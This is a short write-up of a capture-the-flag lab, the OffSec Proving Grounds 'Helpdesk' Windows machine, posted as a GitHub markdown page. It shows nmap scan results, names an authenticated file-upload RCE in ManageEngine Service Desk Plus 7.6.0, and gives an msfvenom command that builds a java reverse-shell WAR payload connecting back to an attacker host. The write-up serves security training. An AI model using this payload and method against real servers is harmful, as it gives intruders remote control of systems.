Skip to content

Latest commit

 

History

History
57 lines (41 loc) · 1.53 KB

2023-08-27-Proving_grounds_Practice-Helpdesk.md

File metadata and controls

57 lines (41 loc) · 1.53 KB
title layout date tag writeups hidden author description
Proving grounds Practice: Helpdesk
post
2023-08-27 03:00
CTF
Offsec labs
OSCP
Writeup
Windows
Pg-Practice
true
true
Naveen
Offsec proving grounds practice windows machine writeup

Nmap

PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows Server (R) 2008 Standard 6001 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open  ms-wbt-server Microsoft Terminal Service
8080/tcp open  http          Apache Tomcat/Coyote JSP engine 1.1

Web PORT: 8080

ManageEngine Service Desk Plus version 7.6.0

img

The ManageEngine Service Desk Plus version 7.6.0 is vulnerable to authenticated Remote Code Execution vulnerability via file upload.

Create reverse TCP shell to upload

msfvenom -p java/shell_reverse_tcp LHOST=<IP> LPORT=4444 -f war > shell.war

As specified in the code create a java reverse shell in the .war file format to upload.

Run netcat listener.

Run the exploit code.

img

Reverse Shell Obtained

img

Thanks for reading!

For more insights and updates, follow me on Twitter: @thevillagehacker.